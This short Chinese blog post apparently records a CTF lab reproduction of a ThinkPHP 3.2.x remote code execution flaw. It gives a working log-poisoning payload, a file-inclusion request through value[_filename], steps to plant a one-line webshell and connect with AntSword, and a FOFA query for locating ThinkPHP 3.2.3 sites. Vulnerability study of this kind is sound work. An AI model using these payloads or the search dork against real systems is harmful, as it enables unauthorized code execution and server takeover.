thinkphp3.2.x 代码执行

一、漏洞概述

ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。 

二、影响范围

ThinkPHP3.2.X

三、漏洞复现

1、构造payload:/index.php?m=--><?=phpinfo();?>让程序报错

2、访问日志生成地址:/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_07_15.log,其中修改24_07_15为当天日期,解析phpinfo成功。

3、获取flag,上传一句话木马。

使用中国蚁剑等工具连接,地址为http://123.58.224.8:16186/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_07_15.log

查看flag

四、漏洞利用

1、fofa:body="ThinkPHP3.2.3"

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值